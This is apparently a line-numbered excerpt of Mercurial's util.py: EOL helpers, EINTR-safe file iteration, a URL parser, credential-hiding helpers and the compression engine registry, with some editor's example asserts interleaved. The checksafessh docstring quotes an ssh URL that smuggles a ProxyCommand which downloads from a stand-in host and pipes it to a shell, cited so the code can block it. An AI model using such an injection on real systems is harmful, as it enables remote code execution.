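assert bytecount(123456789) == '118 MB'   # value >= 100 MB: no decimals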
2386 2385 class transformingwriter(object):
2387 2386 """Writable file wrapper to transform data by function"""
2388 2387
2389 2388 def __init__(self, fp, encode):
2390 2389 self._fp = fp
2391 2390 self._encode = encode
2392 2391
2393 2392 def close(self):
2394 2393 self._fp.close()
2395 2394
2396 2395 def flush(self):
2397 2396 self._fp.flush()
2398 2397
2399 2398 def write(self, data):
2400 2399 return self._fp.write(self._encode(data))
2401 2400
2402 2401 # Matches a single EOL which can either be a CRLF where repeated CR
2403 2402 # are removed or a LF. We do not care about old Macintosh files, so a
2404 2403 # stray CR is an error.
2405 2404 _eolre = remod.compile(br'\r*\n')
2406 2405
2407 2406 def tolf(s):
2408 2407 return _eolre.sub('\n', s)
2409 2408
2410 2409 def tocrlf(s):
2411 2410 return _eolre.sub('\r\n', s)
2412 2411
2413 2412 def _crlfwriter(fp):
2414 2413 return transformingwriter(fp, tocrlf)
2415 2414
2416 2415 if pycompat.oslinesep == '\r\n':
2417 2416 tonativeeol = tocrlf
2418 2417 fromnativeeol = tolf
2419 2418 nativeeolwriter = _crlfwriter
2420 2419 else:
2421 2420 tonativeeol = pycompat.identity
2422 2421 fromnativeeol = pycompat.identity
2423 2422 nativeeolwriter = pycompat.identity
2424 2423
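# Editor's note: illustrative sketch only. tolf() rewrites CRLF (including any
# run of CRs before the LF) to LF, tocrlf() does the reverse, and the
# tonativeeol/fromnativeeol/nativeeolwriter aliases above simply pick whichever
# direction matches the host platform's line separator.
assert tolf(b'a\r\nb\r\n') == b'a\nb\n'
assert tocrlf(b'a\nb\n') == b'a\r\nb\r\n'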
2425 2424 if (pyplatform.python_implementation() == 'CPython' and
2426 2425 sys.version_info < (3, 0)):
2427 2426 # There is an issue in CPython that some IO methods do not handle EINTR
2428 2427 # correctly. The following table shows what CPython version (and functions)
2429 2428 # are affected (buggy: has the EINTR bug, okay: otherwise):
2430 2429 #
2431 2430 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2432 2431 # --------------------------------------------------
2433 2432 # fp.__iter__ | buggy | buggy | okay
2434 2433 # fp.read* | buggy | okay [1] | okay
2435 2434 #
2436 2435 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2437 2436 #
2438 2437 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2439 2438 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2440 2439 #
2441 2440 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2442 2441 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2443 2442 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2444 2443 # fp.__iter__ but not other fp.read* methods.
2445 2444 #
2446 2445 # On modern systems like Linux, the "read" syscall cannot be interrupted
2447 2446 # when reading "fast" files like on-disk files. So the EINTR issue only
2448 2447 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2449 2448 # files approximately as "fast" files and use the fast (unsafe) code path,
2450 2449 # to minimize the performance impact.
2451 2450 if sys.version_info >= (2, 7, 4):
2452 2451 # fp.readline deals with EINTR correctly, use it as a workaround.
2453 2452 def _safeiterfile(fp):
2454 2453 return iter(fp.readline, '')
2455 2454 else:
2456 2455 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2457 2456 # note: this may block longer than necessary because of bufsize.
2458 2457 def _safeiterfile(fp, bufsize=4096):
2459 2458 fd = fp.fileno()
2460 2459 line = ''
2461 2460 while True:
2462 2461 try:
2463 2462 buf = os.read(fd, bufsize)
2464 2463 except OSError as ex:
2465 2464 # os.read only raises EINTR before any data is read
2466 2465 if ex.errno == errno.EINTR:
2467 2466 continue
2468 2467 else:
2469 2468 raise
2470 2469 line += buf
2471 2470 if '\n' in buf:
2472 2471 splitted = line.splitlines(True)
2473 2472 line = ''
2474 2473 for l in splitted:
2475 2474 if l[-1] == '\n':
2476 2475 yield l
2477 2476 else:
2478 2477 line = l
2479 2478 if not buf:
2480 2479 break
2481 2480 if line:
2482 2481 yield line
2483 2482
2484 2483 def iterfile(fp):
2485 2484 fastpath = True
2486 2485 if type(fp) is file:
2487 2486 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2488 2487 if fastpath:
2489 2488 return fp
2490 2489 else:
2491 2490 return _safeiterfile(fp)
2492 2491 else:
2493 2492 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2494 2493 def iterfile(fp):
2495 2494 return fp
2496 2495
2497 2496 def iterlines(iterator):
2498 2497 for chunk in iterator:
2499 2498 for line in chunk.splitlines():
2500 2499 yield line
2501 2500
2502 2501 def expandpath(path):
2503 2502 return os.path.expanduser(os.path.expandvars(path))
2504 2503
2505 2504 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2506 2505 """Return the result of interpolating items in the mapping into string s.
2507 2506
2508 2507 prefix is a single character string, or a two character string with
2509 2508 a backslash as the first character if the prefix needs to be escaped in
2510 2509 a regular expression.
2511 2510
2512 2511 fn is an optional function that will be applied to the replacement text
2513 2512 just before replacement.
2514 2513
2515 2514 escape_prefix is an optional flag that allows using doubled prefix for
2516 2515 its escaping.
2517 2516 """
2518 2517 fn = fn or (lambda s: s)
2519 2518 patterns = '|'.join(mapping.keys())
2520 2519 if escape_prefix:
2521 2520 patterns += '|' + prefix
2522 2521 if len(prefix) > 1:
2523 2522 prefix_char = prefix[1:]
2524 2523 else:
2525 2524 prefix_char = prefix
2526 2525 mapping[prefix_char] = prefix_char
2527 2526 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2528 2527 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2529 2528
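# Editor's note: illustrative sketch only; the prefix and mapping are made up.
assert interpolate(b'%', {b'H': b'abc123'}, b'rev %H') == b'rev abc123'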
2530 2529 def getport(port):
2531 2530 """Return the port for a given network service.
2532 2531
2533 2532 If port is an integer, it's returned as is. If it's a string, it's
2534 2533 looked up using socket.getservbyname(). If there's no matching
2535 2534 service, error.Abort is raised.
2536 2535 """
2537 2536 try:
2538 2537 return int(port)
2539 2538 except ValueError:
2540 2539 pass
2541 2540
2542 2541 try:
2543 2542 return socket.getservbyname(pycompat.sysstr(port))
2544 2543 except socket.error:
2545 2544 raise error.Abort(_("no port number associated with service '%s'")
2546 2545 % port)
2547 2546
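# Editor's note: illustrative sketch only. Integers pass straight through; a
# service-name lookup depends on the host's services database and may raise
# error.Abort when the name is unknown.
assert getport(8080) == 8080
# getport('https') -> 443 on hosts whose services database defines 'https'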
2548 2547 class url(object):
2549 2548 r"""Reliable URL parser.
2550 2549
2551 2550 This parses URLs and provides attributes for the following
2552 2551 components:
2553 2552
2554 2553 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2555 2554
2556 2555 Missing components are set to None. The only exception is
2557 2556 fragment, which is set to '' if present but empty.
2558 2557
2559 2558 If parsefragment is False, fragment is included in query. If
2560 2559 parsequery is False, query is included in path. If both are
2561 2560 False, both fragment and query are included in path.
2562 2561
2563 2562 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2564 2563
2565 2564 Note that for backward compatibility reasons, bundle URLs do not
2566 2565 take host names. That means 'bundle://../' has a path of '../'.
2567 2566
2568 2567 Examples:
2569 2568
2570 2569 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2571 2570 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2572 2571 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2573 2572 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2574 2573 >>> url(b'file:///home/joe/repo')
2575 2574 <url scheme: 'file', path: '/home/joe/repo'>
2576 2575 >>> url(b'file:///c:/temp/foo/')
2577 2576 <url scheme: 'file', path: 'c:/temp/foo/'>
2578 2577 >>> url(b'bundle:foo')
2579 2578 <url scheme: 'bundle', path: 'foo'>
2580 2579 >>> url(b'bundle://../foo')
2581 2580 <url scheme: 'bundle', path: '../foo'>
2582 2581 >>> url(br'c:\foo\bar')
2583 2582 <url path: 'c:\\foo\\bar'>
2584 2583 >>> url(br'\\blah\blah\blah')
2585 2584 <url path: '\\\\blah\\blah\\blah'>
2586 2585 >>> url(br'\\blah\blah\blah#baz')
2587 2586 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2588 2587 >>> url(br'file:///C:\users\me')
2589 2588 <url scheme: 'file', path: 'C:\\users\\me'>
2590 2589
2591 2590 Authentication credentials:
2592 2591
2593 2592 >>> url(b'ssh://joe:xyz@x/repo')
2594 2593 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2595 2594 >>> url(b'ssh://joe@x/repo')
2596 2595 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2597 2596
2598 2597 Query strings and fragments:
2599 2598
2600 2599 >>> url(b'http://host/a?b#c')
2601 2600 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2602 2601 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2603 2602 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2604 2603
2605 2604 Empty path:
2606 2605
2607 2606 >>> url(b'')
2608 2607 <url path: ''>
2609 2608 >>> url(b'#a')
2610 2609 <url path: '', fragment: 'a'>
2611 2610 >>> url(b'http://host/')
2612 2611 <url scheme: 'http', host: 'host', path: ''>
2613 2612 >>> url(b'http://host/#a')
2614 2613 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2615 2614
2616 2615 Only scheme:
2617 2616
2618 2617 >>> url(b'http:')
2619 2618 <url scheme: 'http'>
2620 2619 """
2621 2620
2622 2621 _safechars = "!~*'()+"
2623 2622 _safepchars = "/!~*'()+:\\"
2624 2623 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2625 2624
2626 2625 def __init__(self, path, parsequery=True, parsefragment=True):
2627 2626 # We slowly chomp away at path until we have only the path left
2628 2627 self.scheme = self.user = self.passwd = self.host = None
2629 2628 self.port = self.path = self.query = self.fragment = None
2630 2629 self._localpath = True
2631 2630 self._hostport = ''
2632 2631 self._origpath = path
2633 2632
2634 2633 if parsefragment and '#' in path:
2635 2634 path, self.fragment = path.split('#', 1)
2636 2635
2637 2636 # special case for Windows drive letters and UNC paths
2638 2637 if hasdriveletter(path) or path.startswith('\\\\'):
2639 2638 self.path = path
2640 2639 return
2641 2640
2642 2641 # For compatibility reasons, we can't handle bundle paths as
2643 2642 # normal URLS
2644 2643 if path.startswith('bundle:'):
2645 2644 self.scheme = 'bundle'
2646 2645 path = path[7:]
2647 2646 if path.startswith('//'):
2648 2647 path = path[2:]
2649 2648 self.path = path
2650 2649 return
2651 2650
2652 2651 if self._matchscheme(path):
2653 2652 parts = path.split(':', 1)
2654 2653 if parts[0]:
2655 2654 self.scheme, path = parts
2656 2655 self._localpath = False
2657 2656
2658 2657 if not path:
2659 2658 path = None
2660 2659 if self._localpath:
2661 2660 self.path = ''
2662 2661 return
2663 2662 else:
2664 2663 if self._localpath:
2665 2664 self.path = path
2666 2665 return
2667 2666
2668 2667 if parsequery and '?' in path:
2669 2668 path, self.query = path.split('?', 1)
2670 2669 if not path:
2671 2670 path = None
2672 2671 if not self.query:
2673 2672 self.query = None
2674 2673
2675 2674 # // is required to specify a host/authority
2676 2675 if path and path.startswith('//'):
2677 2676 parts = path[2:].split('/', 1)
2678 2677 if len(parts) > 1:
2679 2678 self.host, path = parts
2680 2679 else:
2681 2680 self.host = parts[0]
2682 2681 path = None
2683 2682 if not self.host:
2684 2683 self.host = None
2685 2684 # path of file:///d is /d
2686 2685 # path of file:///d:/ is d:/, not /d:/
2687 2686 if path and not hasdriveletter(path):
2688 2687 path = '/' + path
2689 2688
2690 2689 if self.host and '@' in self.host:
2691 2690 self.user, self.host = self.host.rsplit('@', 1)
2692 2691 if ':' in self.user:
2693 2692 self.user, self.passwd = self.user.split(':', 1)
2694 2693 if not self.host:
2695 2694 self.host = None
2696 2695
2697 2696 # Don't split on colons in IPv6 addresses without ports
2698 2697 if (self.host and ':' in self.host and
2699 2698 not (self.host.startswith('[') and self.host.endswith(']'))):
2700 2699 self._hostport = self.host
2701 2700 self.host, self.port = self.host.rsplit(':', 1)
2702 2701 if not self.host:
2703 2702 self.host = None
2704 2703
2705 2704 if (self.host and self.scheme == 'file' and
2706 2705 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2707 2706 raise error.Abort(_('file:// URLs can only refer to localhost'))
2708 2707
2709 2708 self.path = path
2710 2709
2711 2710 # leave the query string escaped
2712 2711 for a in ('user', 'passwd', 'host', 'port',
2713 2712 'path', 'fragment'):
2714 2713 v = getattr(self, a)
2715 2714 if v is not None:
2716 2715 setattr(self, a, urlreq.unquote(v))
2717 2716
2718 2717 @encoding.strmethod
2719 2718 def __repr__(self):
2720 2719 attrs = []
2721 2720 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2722 2721 'query', 'fragment'):
2723 2722 v = getattr(self, a)
2724 2723 if v is not None:
2725 2724 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2726 2725 return '<url %s>' % ', '.join(attrs)
2727 2726
2728 2727 def __bytes__(self):
2729 2728 r"""Join the URL's components back into a URL string.
2730 2729
2731 2730 Examples:
2732 2731
2733 2732 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2734 2733 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2735 2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2736 2735 'http://user:pw@host:80/?foo=bar&baz=42'
2737 2736 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2738 2737 'http://user:pw@host:80/?foo=bar%3dbaz'
2739 2738 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2740 2739 'ssh://user:pw@[::1]:2200//home/joe#'
2741 2740 >>> bytes(url(b'http://localhost:80//'))
2742 2741 'http://localhost:80//'
2743 2742 >>> bytes(url(b'http://localhost:80/'))
2744 2743 'http://localhost:80/'
2745 2744 >>> bytes(url(b'http://localhost:80'))
2746 2745 'http://localhost:80/'
2747 2746 >>> bytes(url(b'bundle:foo'))
2748 2747 'bundle:foo'
2749 2748 >>> bytes(url(b'bundle://../foo'))
2750 2749 'bundle:../foo'
2751 2750 >>> bytes(url(b'path'))
2752 2751 'path'
2753 2752 >>> bytes(url(b'file:///tmp/foo/bar'))
2754 2753 'file:///tmp/foo/bar'
2755 2754 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2756 2755 'file:///c:/tmp/foo/bar'
2757 2756 >>> print(url(br'bundle:foo\bar'))
2758 2757 bundle:foo\bar
2759 2758 >>> print(url(br'file:///D:\data\hg'))
2760 2759 file:///D:\data\hg
2761 2760 """
2762 2761 if self._localpath:
2763 2762 s = self.path
2764 2763 if self.scheme == 'bundle':
2765 2764 s = 'bundle:' + s
2766 2765 if self.fragment:
2767 2766 s += '#' + self.fragment
2768 2767 return s
2769 2768
2770 2769 s = self.scheme + ':'
2771 2770 if self.user or self.passwd or self.host:
2772 2771 s += '//'
2773 2772 elif self.scheme and (not self.path or self.path.startswith('/')
2774 2773 or hasdriveletter(self.path)):
2775 2774 s += '//'
2776 2775 if hasdriveletter(self.path):
2777 2776 s += '/'
2778 2777 if self.user:
2779 2778 s += urlreq.quote(self.user, safe=self._safechars)
2780 2779 if self.passwd:
2781 2780 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2782 2781 if self.user or self.passwd:
2783 2782 s += '@'
2784 2783 if self.host:
2785 2784 if not (self.host.startswith('[') and self.host.endswith(']')):
2786 2785 s += urlreq.quote(self.host)
2787 2786 else:
2788 2787 s += self.host
2789 2788 if self.port:
2790 2789 s += ':' + urlreq.quote(self.port)
2791 2790 if self.host:
2792 2791 s += '/'
2793 2792 if self.path:
2794 2793 # TODO: similar to the query string, we should not unescape the
2795 2794 # path when we store it, the path might contain '%2f' = '/',
2796 2795 # which we should *not* escape.
2797 2796 s += urlreq.quote(self.path, safe=self._safepchars)
2798 2797 if self.query:
2799 2798 # we store the query in escaped form.
2800 2799 s += '?' + self.query
2801 2800 if self.fragment is not None:
2802 2801 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2803 2802 return s
2804 2803
2805 2804 __str__ = encoding.strmethod(__bytes__)
2806 2805
2807 2806 def authinfo(self):
2808 2807 user, passwd = self.user, self.passwd
2809 2808 try:
2810 2809 self.user, self.passwd = None, None
2811 2810 s = bytes(self)
2812 2811 finally:
2813 2812 self.user, self.passwd = user, passwd
2814 2813 if not self.user:
2815 2814 return (s, None)
2816 2815 # authinfo[1] is passed to urllib2 password manager, and its
2817 2816 # URIs must not contain credentials. The host is passed in the
2818 2817 # URIs list because Python < 2.4.3 uses only that to search for
2819 2818 # a password.
2820 2819 return (s, (None, (s, self.host),
2821 2820 self.user, self.passwd or ''))
2822 2821
2823 2822 def isabs(self):
2824 2823 if self.scheme and self.scheme != 'file':
2825 2824 return True # remote URL
2826 2825 if hasdriveletter(self.path):
2827 2826 return True # absolute for our purposes - can't be joined()
2828 2827 if self.path.startswith(br'\\'):
2829 2828 return True # Windows UNC path
2830 2829 if self.path.startswith('/'):
2831 2830 return True # POSIX-style
2832 2831 return False
2833 2832
2834 2833 def localpath(self):
2835 2834 if self.scheme == 'file' or self.scheme == 'bundle':
2836 2835 path = self.path or '/'
2837 2836 # For Windows, we need to promote hosts containing drive
2838 2837 # letters to paths with drive letters.
2839 2838 if hasdriveletter(self._hostport):
2840 2839 path = self._hostport + '/' + self.path
2841 2840 elif (self.host is not None and self.path
2842 2841 and not hasdriveletter(path)):
2843 2842 path = '/' + path
2844 2843 return path
2845 2844 return self._origpath
2846 2845
2847 2846 def islocal(self):
2848 2847 '''whether localpath will return something that posixfile can open'''
2849 2848 return (not self.scheme or self.scheme == 'file'
2850 2849 or self.scheme == 'bundle')
2851 2850
2852 2851 def hasscheme(path):
2853 2852 return bool(url(path).scheme)
2854 2853
2855 2854 def hasdriveletter(path):
2856 2855 return path and path[1:2] == ':' and path[0:1].isalpha()
2857 2856
2858 2857 def urllocalpath(path):
2859 2858 return url(path, parsequery=False, parsefragment=False).localpath()
2860 2859
2861 2860 def checksafessh(path):
2862 2861 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2863 2862
2864 2863 This is a sanity check for ssh urls. ssh will parse the first item as
2865 2864 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2866 2865 Let's prevent these potentially exploited urls entirely and warn the
2867 2866 user.
2868 2867
2869 2868 Raises an error.Abort when the url is unsafe.
2870 2869 """
2871 2870 path = urlreq.unquote(path)
2872 2871 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2873 2872 raise error.Abort(_('potentially unsafe url: %r') %
2874 2873 (pycompat.bytestr(path),))
2875 2874
2876 2875 def hidepassword(u):
2877 2876 '''hide user credential in a url string'''
2878 2877 u = url(u)
2879 2878 if u.passwd:
2880 2879 u.passwd = '***'
2881 2880 return bytes(u)
2882 2881
2883 2882 def removeauth(u):
2884 2883 '''remove all authentication information from a url string'''
2885 2884 u = url(u)
2886 2885 u.user = u.passwd = None
2887 2886 return bytes(u)
2888 2887
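# Editor's note: illustrative sketch only; the credentials below are made up.
u = b'https://alice:secret@example.com/repo'
assert hidepassword(u) == b'https://alice:***@example.com/repo'
assert removeauth(u) == b'https://example.com/repo'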
2889 2888 timecount = unitcountfn(
2890 2889 (1, 1e3, _('%.0f s')),
2891 2890 (100, 1, _('%.1f s')),
2892 2891 (10, 1, _('%.2f s')),
2893 2892 (1, 1, _('%.3f s')),
2894 2893 (100, 0.001, _('%.1f ms')),
2895 2894 (10, 0.001, _('%.2f ms')),
2896 2895 (1, 0.001, _('%.3f ms')),
2897 2896 (100, 0.000001, _('%.1f us')),
2898 2897 (10, 0.000001, _('%.2f us')),
2899 2898 (1, 0.000001, _('%.3f us')),
2900 2899 (100, 0.000000001, _('%.1f ns')),
2901 2900 (10, 0.000000001, _('%.2f ns')),
2902 2901 (1, 0.000000001, _('%.3f ns')),
2903 2902 )
2904 2903
2905 2904 _timenesting = [0]
2906 2905
2907 2906 def timed(func):
2908 2907 '''Report the execution time of a function call to stderr.
2909 2908
2910 2909 During development, use as a decorator when you need to measure
2911 2910 the cost of a function, e.g. as follows:
2912 2911
2913 2912 @util.timed
2914 2913 def foo(a, b, c):
2915 2914 pass
2916 2915 '''
2917 2916
2918 2917 def wrapper(*args, **kwargs):
2919 2918 start = timer()
2920 2919 indent = 2
2921 2920 _timenesting[0] += indent
2922 2921 try:
2923 2922 return func(*args, **kwargs)
2924 2923 finally:
2925 2924 elapsed = timer() - start
2926 2925 _timenesting[0] -= indent
2927 2926 stderr = procutil.stderr
2928 2927 stderr.write('%s%s: %s\n' %
2929 2928 (' ' * _timenesting[0], func.__name__,
2930 2929 timecount(elapsed)))
2931 2930 return wrapper
2932 2931
2933 2932 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2934 2933 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2935 2934
2936 2935 def sizetoint(s):
2937 2936 '''Convert a space specifier to a byte count.
2938 2937
2939 2938 >>> sizetoint(b'30')
2940 2939 30
2941 2940 >>> sizetoint(b'2.2kb')
2942 2941 2252
2943 2942 >>> sizetoint(b'6M')
2944 2943 6291456
2945 2944 '''
2946 2945 t = s.strip().lower()
2947 2946 try:
2948 2947 for k, u in _sizeunits:
2949 2948 if t.endswith(k):
2950 2949 return int(float(t[:-len(k)]) * u)
2951 2950 return int(t)
2952 2951 except ValueError:
2953 2952 raise error.ParseError(_("couldn't parse size: %s") % s)
2954 2953
2955 2954 class hooks(object):
2956 2955 '''A collection of hook functions that can be used to extend a
2957 2956 function's behavior. Hooks are called in lexicographic order,
2958 2957 based on the names of their sources.'''
2959 2958
2960 2959 def __init__(self):
2961 2960 self._hooks = []
2962 2961
2963 2962 def add(self, source, hook):
2964 2963 self._hooks.append((source, hook))
2965 2964
2966 2965 def __call__(self, *args):
2967 2966 self._hooks.sort(key=lambda x: x[0])
2968 2967 results = []
2969 2968 for source, hook in self._hooks:
2970 2969 results.append(hook(*args))
2971 2970 return results
2972 2971
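# Editor's note: illustrative sketch only; the source names are made up. Hooks
# run sorted by source name, not in registration order.
h = hooks()
h.add('b-ext', lambda x: x + 1)
h.add('a-ext', lambda x: x * 2)
assert h(3) == [6, 4]   # 'a-ext' fires before 'b-ext'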
2973 2972 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2974 2973 '''Yields lines for a nicely formatted stacktrace.
2975 2974 Skips the 'skip' last entries, then returns the last 'depth' entries.
2976 2975 Each file+linenumber is formatted according to fileline.
2977 2976 Each line is formatted according to line.
2978 2977 If line is None, it yields:
2979 2978 length of longest filepath+line number,
2980 2979 filepath+linenumber,
2981 2980 function
2982 2981
2983 2982 Not to be used in production code but very convenient while developing.
2984 2983 '''
2985 2984 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2986 2985 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2987 2986 ][-depth:]
2988 2987 if entries:
2989 2988 fnmax = max(len(entry[0]) for entry in entries)
2990 2989 for fnln, func in entries:
2991 2990 if line is None:
2992 2991 yield (fnmax, fnln, func)
2993 2992 else:
2994 2993 yield line % (fnmax, fnln, func)
2995 2994
2996 2995 def debugstacktrace(msg='stacktrace', skip=0,
2997 2996 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2998 2997 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2999 2998 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3000 2999 By default it will flush stdout first.
3001 3000 It can be used everywhere and intentionally does not require a ui object.
3002 3001 Not to be used in production code but very convenient while developing.
3003 3002 '''
3004 3003 if otherf:
3005 3004 otherf.flush()
3006 3005 f.write('%s at:\n' % msg.rstrip())
3007 3006 for line in getstackframes(skip + 1, depth=depth):
3008 3007 f.write(line)
3009 3008 f.flush()
3010 3009
3011 3010 class dirs(object):
3012 3011 '''a multiset of directory names from a dirstate or manifest'''
3013 3012
3014 3013 def __init__(self, map, skip=None):
3015 3014 self._dirs = {}
3016 3015 addpath = self.addpath
3017 3016 if safehasattr(map, 'iteritems') and skip is not None:
3018 3017 for f, s in map.iteritems():
3019 3018 if s[0] != skip:
3020 3019 addpath(f)
3021 3020 else:
3022 3021 for f in map:
3023 3022 addpath(f)
3024 3023
3025 3024 def addpath(self, path):
3026 3025 dirs = self._dirs
3027 3026 for base in finddirs(path):
3028 3027 if base in dirs:
3029 3028 dirs[base] += 1
3030 3029 return
3031 3030 dirs[base] = 1
3032 3031
3033 3032 def delpath(self, path):
3034 3033 dirs = self._dirs
3035 3034 for base in finddirs(path):
3036 3035 if dirs[base] > 1:
3037 3036 dirs[base] -= 1
3038 3037 return
3039 3038 del dirs[base]
3040 3039
3041 3040 def __iter__(self):
3042 3041 return iter(self._dirs)
3043 3042
3044 3043 def __contains__(self, d):
3045 3044 return d in self._dirs
3046 3045
3047 3046 if safehasattr(parsers, 'dirs'):
3048 3047 dirs = parsers.dirs
3049 3048
3050 3049 def finddirs(path):
3051 3050 pos = path.rfind('/')
3052 3051 while pos != -1:
3053 3052 yield path[:pos]
3054 3053 pos = path.rfind('/', 0, pos)
3055 3054
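# Editor's note: illustrative sketch only, using the pure-Python dirs class
# above; the optional C replacement from parsers.dirs is expected to behave the
# same for this usage. finddirs() yields ancestors deepest-first, and dirs keeps
# a reference count so a shared parent survives deleting one of its paths.
assert list(finddirs(b'a/b/c.txt')) == [b'a/b', b'a']

d = dirs([b'a/b/c.txt', b'a/d.txt'])
assert b'a' in d and b'a/b' in d
d.delpath(b'a/b/c.txt')
assert b'a' in d          # still referenced by 'a/d.txt'
assert b'a/b' not in d    # its last path was removed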
3056 3055 # compression code
3057 3056
3058 3057 SERVERROLE = 'server'
3059 3058 CLIENTROLE = 'client'
3060 3059
3061 3060 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3062 3061 (u'name', u'serverpriority',
3063 3062 u'clientpriority'))
3064 3063
3065 3064 class compressormanager(object):
3066 3065 """Holds registrations of various compression engines.
3067 3066
3068 3067 This class essentially abstracts the differences between compression
3069 3068 engines to allow new compression formats to be added easily, possibly from
3070 3069 extensions.
3071 3070
3072 3071 Compressors are registered against the global instance by calling its
3073 3072 ``register()`` method.
3074 3073 """
3075 3074 def __init__(self):
3076 3075 self._engines = {}
3077 3076 # Bundle spec human name to engine name.
3078 3077 self._bundlenames = {}
3079 3078 # Internal bundle identifier to engine name.
3080 3079 self._bundletypes = {}
3081 3080 # Revlog header to engine name.
3082 3081 self._revlogheaders = {}
3083 3082 # Wire proto identifier to engine name.
3084 3083 self._wiretypes = {}
3085 3084
3086 3085 def __getitem__(self, key):
3087 3086 return self._engines[key]
3088 3087
3089 3088 def __contains__(self, key):
3090 3089 return key in self._engines
3091 3090
3092 3091 def __iter__(self):
3093 3092 return iter(self._engines.keys())
3094 3093
3095 3094 def register(self, engine):
3096 3095 """Register a compression engine with the manager.
3097 3096
3098 3097 The argument must be a ``compressionengine`` instance.
3099 3098 """
3100 3099 if not isinstance(engine, compressionengine):
3101 3100 raise ValueError(_('argument must be a compressionengine'))
3102 3101
3103 3102 name = engine.name()
3104 3103
3105 3104 if name in self._engines:
3106 3105 raise error.Abort(_('compression engine %s already registered') %
3107 3106 name)
3108 3107
3109 3108 bundleinfo = engine.bundletype()
3110 3109 if bundleinfo:
3111 3110 bundlename, bundletype = bundleinfo
3112 3111
3113 3112 if bundlename in self._bundlenames:
3114 3113 raise error.Abort(_('bundle name %s already registered') %
3115 3114 bundlename)
3116 3115 if bundletype in self._bundletypes:
3117 3116 raise error.Abort(_('bundle type %s already registered by %s') %
3118 3117 (bundletype, self._bundletypes[bundletype]))
3119 3118
3120 3119 # No external facing name declared.
3121 3120 if bundlename:
3122 3121 self._bundlenames[bundlename] = name
3123 3122
3124 3123 self._bundletypes[bundletype] = name
3125 3124
3126 3125 wiresupport = engine.wireprotosupport()
3127 3126 if wiresupport:
3128 3127 wiretype = wiresupport.name
3129 3128 if wiretype in self._wiretypes:
3130 3129 raise error.Abort(_('wire protocol compression %s already '
3131 3130 'registered by %s') %
3132 3131 (wiretype, self._wiretypes[wiretype]))
3133 3132
3134 3133 self._wiretypes[wiretype] = name
3135 3134
3136 3135 revlogheader = engine.revlogheader()
3137 3136 if revlogheader and revlogheader in self._revlogheaders:
3138 3137 raise error.Abort(_('revlog header %s already registered by %s') %
3139 3138 (revlogheader, self._revlogheaders[revlogheader]))
3140 3139
3141 3140 if revlogheader:
3142 3141 self._revlogheaders[revlogheader] = name
3143 3142
3144 3143 self._engines[name] = engine
3145 3144
3146 3145 @property
3147 3146 def supportedbundlenames(self):
3148 3147 return set(self._bundlenames.keys())
3149 3148
3150 3149 @property
3151 3150 def supportedbundletypes(self):
3152 3151 return set(self._bundletypes.keys())
3153 3152
3154 3153 def forbundlename(self, bundlename):
3155 3154 """Obtain a compression engine registered to a bundle name.
3156 3155
3157 3156 Will raise KeyError if the bundle type isn't registered.
3158 3157
3159 3158 Will abort if the engine is known but not available.
3160 3159 """
3161 3160 engine = self._engines[self._bundlenames[bundlename]]
3162 3161 if not engine.available():
3163 3162 raise error.Abort(_('compression engine %s could not be loaded') %
3164 3163 engine.name())
3165 3164 return engine
3166 3165
3167 3166 def forbundletype(self, bundletype):
3168 3167 """Obtain a compression engine registered to a bundle type.
3169 3168
3170 3169 Will raise KeyError if the bundle type isn't registered.
3171 3170
3172 3171 Will abort if the engine is known but not available.
3173 3172 """
3174 3173 engine = self._engines[self._bundletypes[bundletype]]
3175 3174 if not engine.available():
